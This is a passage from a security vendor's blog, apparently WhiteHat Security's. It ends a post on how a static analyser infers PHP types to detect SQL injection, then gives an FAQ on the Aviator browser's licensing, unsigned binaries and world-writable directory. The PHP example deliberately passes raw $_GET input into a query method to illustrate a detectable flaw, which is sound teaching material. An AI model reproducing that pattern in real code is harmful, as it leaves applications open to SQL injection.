You may be asking yourself: “what if $anonymous was of type NotSoAnonymous or NsaAnonymous? Would it still flag a vulnerability?” The answer is a resounding yes. Static analysis technologies do not, and in my opinion should not, attempt to evaluate conditionals as such practice will lead to an overwhelming number of lost vulnerabilities. Static code analysis could support trivial conditionals, such as comparing primitives, but conditionals in real-world code require much more guesswork and various forms of heuristics that ultimately lead to poor results. Even so, is it not fair to say that at some point in the application “funct_a()” will be greater than “funct_b()”? Otherwise, what is the point of the conditional in the first place? Our technology assumes all conditionals will be true at some point in time.

Remember when I said this was easy in theory? Well, this is where it starts to get really interesting: Consider the following code snippet and assume we do not have the source code available for “create_class_1()”, “create_class_2()” and “create_class_3()”:


$anonymous = null;

if (funct_a() > funct_b()) {
     $anonymous = create_class_1();
} elseif (funct_a() == funct_b()) {
     $anonymous = create_class_2();
} else {
     $anonymous = create_class_3();
}

$anonymous->runQuery($_GET['name']);

Now what is the range of possible data types for the $anonymous variable when used in the vulnerable statement? This is where we being to stress the capabilities of the security rule language itself. WhiteHat Sentinel Source solves this by allowing the security rule writer to explicitly define the data type returned from a function invocation if such data type cannot be determined based on the provided source code. For example, the security rule writer could capture a rule stating that the return value of the create_class_3() function invocation is of type Anonymous. The engine would then take this information, propagate data types as before and correctly flag the SQL Injection vulnerability associated with runQuery method invocation.

WhiteHat Sentinel Source’s type inference system allows us to perform more accurate and efficient analysis of source code in dynamically typed languages. Our type inference system not only allows us to more accurately capture security rules, but it also allows us to more accurately model control flow from method invocations of instances to method declarations of class declarations. Such capability is critical for any real world static code analysis of PHP source code.

I hope you enjoyed this rather technical and slightly lengthy blog post. It was a blast building out support for PHP and I look forward to our Sentinel Source customers benefiting from our newly available technology. Until next time…

Aviator: Some Answered Questions

We publicly released Aviator on Monday, Oct 21. Since then we’ve received an avalanche of questions, suggestions, and feature requests regarding the browser. The level of positive feedback and support has been overwhelming. Lots of great ideas and comments that will help shape where we go from here. If you have something to share, a question or concern, please contact us at aviator@whitehatsec.com.

Now let’s address some of the most often heard questions so far:

Where’s the source code to Aviator?

WhiteHat Security is still in the very early stages of Aviator’s public release and we are gathering all feedback internally. We’ll be using this feedback to prioritize where our resources will be spent. Deciding whether or not to release the source code is part of these discussions.

Aviator unitizes open source software via Chromium, don’t you have to release the source?

WhiteHat Security respects and appreciates the open source software community. We’ve long supported various open source organizations and projects throughout our history. We also know how important OSS licenses are, so we diligently studied what was required for when Aviator would be publicly available.

Chromium, of which Aviator is derived, contains a wide variety of OSS licenses. As can be seen here using aviator://credits/ in Aviator or chrome://credits/ in Google Chrome. The portions of the code we modified in Aviator are all under BSD, or BSD-like licenses. As such, publishing our changes is, strictly speaking, not a licensing requirement. This is not to say we won’t in the future, just that we’re discussing it internally first. Doing so is a big decision that shouldn’t be taken lightly. Of course, when and/if we make a change to the GPL or similar licensed software in Chromium, we’ll happily publish the updates as required.

When is Aviator going to be available for Windows, Linux, iOS, Android, etc.?

Aviator was originally an internal project designed for WhiteHat Security employees. This served as a great environment to test our theories about how a truly secure and privacy-protecting browser should work. Since WhiteHat is primarily a Mac shop, we built it for OS X. Those outside of WhiteHat wanted to use the same browser that we did, so this week we made Aviator publicly available.

We are still in the very early days of making Aviator available to the public. The feedback so far has been very positive and requests for a Windows, Linux and even open source versions are pouring in, so we are definitely determining where to focus our resources on what should come next, but there is not definite timeframe yet of when other versions will be available.

How long has WhiteHat been working on Aviator?

Browser security has been a subject of personal and professional interest for both myself, and Robert “RSnake” Hansen (Director, Product Management) for years. Both of us have discussed the risks of browser security around the world. A big part of Aviator research was spent creating something to protect WhiteHat employees and the data they are responsible for. Outside of WhiteHat many people ask us what browser we use. Individually our answer has been, “mine.” Now we can be more specific: that browser is Aviator. A browser we feel confident in using not only for our own security and privacy, but one we may confidently recommend to family and friends when asked.

Browsers have pop up blockers to deal with ads. What is different about Aviator’s approach?

Popup blockers used to work wonders, but advertisers switched to sourcing in JavaScript and actually putting content on the page. They no longer have to physically create a new window because they can take over the entire page. Using Aviator, the user’s browser doesn’t even make the connection to an advertising networks’ servers, so obnoxious or potentially dangerous ads simply don’t load.

Why isn’t the Aviator application binary signed?

During the initial phases of development we considered releasing Aviator as a Beta through the Mac Store. Browsers attempt to take advantage of the fastest method of rendering they can. These APIs are sometimes unsupported by the OS and are called “private APIs”. Apple does not support these APIs because they may change and they don’t want to be held accountable for when things break. As a result, while they allow people to use their undocumented and highly speed private APIs, they don’t allow people to distribute applications that use private APIs. We can speculate the reason being that users are likely to think it’s Apple’s fault as opposed to the program when things break. So after about a month of wrestling with it, we decided that for now, we’d avoid using the Mac Store. In the shuffle we didn’t continue signing the binaries as we had been. It was simply an oversight.

Update: November 8, 2013:
Our dev team analyzed the overly-permissive chmod settings that Aviator 1.1 shipped with. We agreed it was overly permissive and have fixed the issue to be more in line with existing browsers to protect users on multi-user systems. Click to read more on our Aviator Browser 1.2 Beta release.

Why is Aviator’s application directory world-writable?

During the development process all of our developers were on dedicated computers, not shared computers. So this was an oversight brought on by the fact that there was no need to hide data from one another and therefore chmod permissions were too lax as source files were being copied and edited. This wouldn’t have been an issue if the permissions had been changed back to their less permissive state, but it was missed. We will get it fixed in an upcoming release.

Update: November 8, 2013:
Our dev team analyzed the overly-permissive chmod settings that Aviator 1.1 shipped with. We agreed it was overly permissive and have fixed the issue to be more in line with existing browsers to protect users on multi-user systems. Click to read more on our Aviator Browser 1.2 Beta release.

Does Aviator support Chrome extensions?

Yes, all Chrome extensions should function under Aviator. If an issue comes up, please report it to aviator@whitehatsec.com so we can investigate.

Wait a minute, first you say, “if you aren’t paying you are the product,” then you offer a free browser?
Fair point. Like we’ve said, Aviator started off as an internal project simply to protect WhiteHat employees and is not an official company “product.” Those outside the company asked if they could use the same browser that we do. Aviator is our answer to that. Since we’re not in the advertising and tracking business, how could we say no? At some point in the future we’ll figure out a way to generate revenue from Aviator, but in the mean time, we’re mostly interested in offering a browser that security and privacy-conscious people want to use.

Have you gotten and feedback from the major browser vendors about Aviator? If so, what has it been?

We have not received any official feedback from any of the major browser vendors, though there has been some feedback from various employees of those vendors shared informally over Twitter. Some feedback has been positive, others negative. In either case, we’re most interested in server the everyday consumer.

Keep the questions and feedback coming and we will continue to endeavor to improve Aviator in ways that will be beneficial to the security community and to the average consumer.